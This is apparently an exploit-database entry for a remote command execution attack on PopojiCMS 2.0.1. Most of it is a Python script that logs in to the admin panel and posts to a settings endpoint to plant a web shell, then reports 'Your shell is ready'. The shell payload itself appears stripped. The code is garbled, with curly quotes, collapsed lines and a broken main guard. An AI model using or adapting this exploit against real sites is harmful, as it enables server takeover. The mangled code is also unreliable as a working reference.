Exploit Title: PopojiCMS 2.0.1 - Remote Command Execution

Date: 14/04/2024

Exploit Author: Ahmet Ümit BAYRAM

Vendor Homepage: https://www.popojicms.org/

Software Link:

https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip

Version: Version : 2.0.1

Tested on: https://www.softaculous.com/apps/cms/PopojiCMS

import requests import time import sys

def exploit(url, username, password):

login_url = f”{url}/po-admin/route.php?mod=login&act=proclogin” login_data = {“username”: username, “password”: password} headers = {“Content-Type”: “application/x-www-form-urlencoded”, “Referer”: f “{url}/po-admin/index.php”} session = requests.Session() login_response = session.post(login_url, data=login_data, headers=headers) if “Administrator PopojiCMS” in login_response.text: print(“Login Successful!”) time.sleep(1) # 1 saniye bekle else: print(“Login Failed!”) return

edit_url = f”{url}/po-admin/route.php?mod=setting&act=metasocial” edit_data = {“meta_content”: “”“<html>

</html>”””} edit_response = session.post(edit_url, data=edit_data, headers=headers) if “cmd” in edit_response.text: print(“Your shell is ready:”, url) time.sleep(1) else: print(“Exploit Failed!”) return

if name == “main”: if len(sys.argv) != 4: print(“Kullanım: python exploit.py sitename username password”) sys.exit(1)

url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] print(“Exploiting…”) time.sleep(1) print(“Logging in…”) time.sleep(1) exploit(url, username, password)